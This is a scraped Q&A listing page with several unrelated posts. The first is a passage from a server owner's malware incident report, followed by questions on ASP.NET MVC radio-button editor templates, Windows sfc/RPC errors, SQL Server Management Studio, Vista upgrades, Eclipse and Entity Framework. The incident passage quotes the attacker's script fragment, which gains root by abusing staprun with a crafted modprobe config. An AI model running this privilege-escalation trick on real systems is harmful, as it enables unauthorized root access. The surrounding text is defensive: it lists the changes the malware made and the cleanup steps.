echo "no staprun, exiting";
exit;
else
echo "found";
echo "-> trying to exploit... ";
printf "install uprobes /bin/sh" > ololo.conf;
MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo
rm -f ololo.conf
fi

Other Noticeable Edits

Any files that contain ([.htaccess]|[index|header|footer].php|[*.js]) will have been modified, and all system file and directory permissions will have been changed to: x--x--x

My steps to remove this malware

Re-uploaded original php/js files to revert any changes
Changed all user passwords
Modified hosts.allow to a static IP so that only I have access
Removed the above 4 files and checked all modified file dates within that directory for any other recent modifications; none can be found (a simple marker scan is sketched at the end of this post)

Conclusion

I'm hoping that as they did not have root access, any changes they wished to make higher up failed and they were only able to display an iframe on the site for a short amount of time? What else do I need to look for to check the malware infection has not spread?

Second Conclusion

This malware sinks too deep to 'clean'; if you get infected I recommend a server nuke and a rebuild from backups with increased security.

Possibility

It's possible that FileZilla FTP passwords were stolen through a trojan, as they're unfortunately stored unencrypted; however, Trend Micro Titanium has not found any. The settings box to disable password saving has now been ticked, and I recommend you take this action as well.

    Read the article

  • MVC 2 Editor Template for Radio Buttons

    - by Steve Michelotti
A while back I blogged about how to create an HTML Helper to produce a radio button list.  In that post, my HTML helper was "wrapping" the FluentHtml library from MvcContrib to produce the following html output (given an IEnumerable list containing the items "Foo" and "Bar"):

1: <div>
2: <input id="Name_Foo" name="Name" type="radio" value="Foo" /><label for="Name_Foo" id="Name_Foo_Label">Foo</label>
3: <input id="Name_Bar" name="Name" type="radio" value="Bar" /><label for="Name_Bar" id="Name_Bar_Label">Bar</label>
4: </div>

With the release of MVC 2, we now have editor templates we can use that rely on metadata to allow us to customize our views appropriately.  For example, for the radio buttons above, we want the "id" attribute to be differentiated and unique, and we want the "name" attribute to be the same across radio buttons so the buttons will be grouped together and so model binding will work appropriately. We also want the "for" attribute in the <label> element to be set correctly to point to the id of the corresponding radio button.  The default behavior of the RadioButtonFor() method that comes OOTB with MVC produces the same value for the "id" and "name" attributes, so this isn't exactly what I want out of the box if I'm trying to produce the HTML markup above.

If we use an EditorTemplate, the first gotcha that we run into is that, by default, the templates just work on your view model's property. But in this case, we also need the list of items to populate all the radio buttons. It turns out that the EditorFor() methods do give you a way to pass in additional data. There is an overload of the EditorFor() method where the last parameter allows you to pass an anonymous object for "extra" data that you can use in your view – it gets put on the view data dictionary:

1: <%: Html.EditorFor(m => m.Name, "RadioButtonList", new { selectList = new SelectList(new[] { "Foo", "Bar" }) })%>

Now we can create a file called RadioButtonList.ascx that looks like this:

1: <%@ Control Language="C#" Inherits="System.Web.Mvc.ViewUserControl" %>
2: <%
3: var list = this.ViewData["selectList"] as SelectList;
4: %>
5: <div>
6: <% foreach (var item in list) {
7: var radioId = ViewData.TemplateInfo.GetFullHtmlFieldId(item.Value);
8: var checkedAttr = item.Selected ? "checked=\"checked\"" : string.Empty;
9: %>
10: <input type="radio" id="<%: radioId %>" name="<%: ViewData.TemplateInfo.HtmlFieldPrefix %>" value="<%: item.Value %>" <%: checkedAttr %>/>
11: <label for="<%: radioId %>"><%: item.Text %></label>
12: <% } %>
13: </div>

There are several things to note about the code above. First, you can see on line #3 that it's getting the SelectList out of the view data dictionary. Then on line #7 it uses the GetFullHtmlFieldId() method from the TemplateInfo class to ensure we get unique IDs. We pass the Value to this method so that it will produce IDs like "Name_Foo" and "Name_Bar" rather than just "Name", which is our property name. However, for the "name" attribute (on line #10) we can just use the normal HtmlFieldPrefix property so that we ensure all radio buttons have the same name, which corresponds to the view model's property name. We also get to leverage the fact that a SelectListItem has a Boolean Selected property, so we can set the checkedAttr variable on line #8 and use it on line #10. Finally, it's trivial to set the correct "for" attribute for the <label> on line #11 since we already produced that value.
Because the TemplateInfo class provides all the metadata for our view, we're able to produce a view that is widely re-usable across our application. In fact, we can create a couple of HTML helpers to better encapsulate this call and make it more user friendly:

1: public static MvcHtmlString RadioButtonList<TModel, TProperty>(this HtmlHelper<TModel> htmlHelper, Expression<Func<TModel, TProperty>> expression, params string[] items)
2: {
3: return htmlHelper.RadioButtonList(expression, new SelectList(items));
4: }
5:
6: public static MvcHtmlString RadioButtonList<TModel, TProperty>(this HtmlHelper<TModel> htmlHelper, Expression<Func<TModel, TProperty>> expression, IEnumerable<SelectListItem> items)
7: {
8: var func = expression.Compile();
9: var result = func(htmlHelper.ViewData.Model);
10: var list = new SelectList(items, "Value", "Text", result);
11: return htmlHelper.EditorFor(expression, "RadioButtonList", new { selectList = list });
12: }

This allows us to simplify the call like this:

1: <%: Html.RadioButtonList(m => m.Name, "Foo", "Bar" ) %>

In that example, the values for the radio buttons are hard-coded and passed in directly. But if you had a view model that contained a property for the collection of items, you could call the second overload like this:

1: <%: Html.RadioButtonList(m => m.Name, Model.FooBarList ) %>

The editor templates introduced in MVC 2 definitely allow for much more flexible views/editors than previously available. By knowing about the features you have available to you with the TemplateInfo class, you can take these concepts and customize your editors with extreme flexibility and re-usability.

    Read the article

  • Running sfc /scannow provides the error The specific error code is 0x000006ba [The RPC server is unavailable]

    - by leeand00
    I think that my mup.sys file is corrupted. I received the following error when trying to access a network share that was located on my Windows 7 box, from my Windows XP box: No network provider accepted the given network path. After reading this I attempted to follow the directions by booting my computer into Safe Mode. After I run "sfc /scannow" I receive the following error message: The specific error code is 0x000006ba [The RPC server is unavailable]. Additionally, when I go into Services, it says that the Remote Procedure Call (RPC) service is running but that the Remote Procedure Call (RPC) Locator is not running. When I try to start the Remote Procedure Call (RPC) Locator, it gives me an error saying: Error 1084: This service cannot be started in Safe Mode. So what exactly can I do about this if the RPC Locator service can't be started in Safe Mode?

    Read the article

  • Cannot find one or more components. Please reinstall application

    - by Chris
    I am running Windows 8 64-bit and have SQL Server 2012 installed. I downloaded the client tools, looked in the directory for SQL Server Management Studio, and can see it's there. When I try to run SQL Server Management Studio I receive the error message: "Cannot find one or more components. Please reinstall application". This problem just started. I have reinstalled the application and downloaded the service packs. The shortcut shows the correct path, but it still will not run.

    Read the article

  • Upgrading from Vista Home Basic to Vista Business

    - by miracle2k
    I have a PC that came with Vista Home Basic, and I now have some need for Remote Desktop, which is not included in Home Basic, so I'd like to upgrade. There is apparently a hack to get Remote Desktop working in Home Premium, and obviously it's included in Ultimate, but really, the Business edition would be the best fit for us. Unfortunately, Windows Anytime Upgrade does not provide a path from Home Basic to Business. My question is: if I were to buy a standalone Vista Business license, could I use it to upgrade my current Home Basic installation? Would it be as simple as entering the new license key?

    Read the article

  • Eclipse says "Access Denied" when running javaw and how to fix it?

    - by Eduardo de Luna
    I'm trying to get Eclipse to compile and run a HelloWorld class, but it can't even do that. I have installed the Eclipse x86 SDK 4.2.0 together with the latest JRE and JDK, both 64-bit. I also have the PATH variable set so the JDK tools respond at the command prompt. When I try to run the following code:

    class HelloWorld {
        public static void main(String[] args) {
            System.out.println("Hello World!");
        }
    }

    it returns the following error:

    Exception occurred executing command line. Cannot run program "C:\Program Files\Java\jre7\bin\javaw.exe" (in directory "C:\Users\Default\workspace\devs"): CreateProcess error=5, Access is denied.

    Can you help me fix this? Thanks!

    Read the article

  • The entity type String is not part of the model for the current context error [migrated]

    - by Michael V
    I am getting the following error in my controller after the view submits the collection:

    The entity type String is not part of the model for the current context.

    Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

    Exception Details: System.InvalidOperationException: The entity type String is not part of the model for the current context.

    Source Error:

    Line 51: foreach (var survey in mysurveys)
    Line 52: {
    Line 53: db.Entry(survey).State = EntityState.Modified;
    Line 54:
    Line 55: // db.Entry(survey).State = EntityState.Modified;

    Here is the code:

    [HttpPost]
    public ActionResult UpdateTest(FormCollection mysurveys)
    {
        System.Diagnostics.Debug.WriteLine("iam in test post" + mysurveys.Count);
        foreach (var survey in mysurveys)
        {
            db.Entry(survey).State = EntityState.Modified;
        }
        db.SaveChanges();
        return View(mysurveys);
    }

    Similar code with one record only (no foreach) works fine.
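    One likely cause: enumerating a FormCollection yields the form's string keys, so db.Entry(survey) is handed a String rather than an entity type the context knows about. Below is a minimal sketch of one possible fix; it assumes a Survey entity class and a view that posts an indexed collection MVC can bind to List<Survey> (both assumptions, since the model isn't shown in the question):

    [HttpPost]
    public ActionResult UpdateTest(List<Survey> mysurveys)
    {
        // Model binding materializes Survey entities from the posted fields,
        // so each item here is a real entity type, not a string form key.
        foreach (var survey in mysurveys)
        {
            db.Entry(survey).State = EntityState.Modified;
        }
        db.SaveChanges();
        return View(mysurveys);
    }

    For the binding to work, the view's inputs would need indexed names such as "mysurveys[0].Id", "mysurveys[0].Title", and so on.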

    Read the article

< Previous Page | 870 871 872 873 874 875 876 877 878 879 880 881  | Next Page >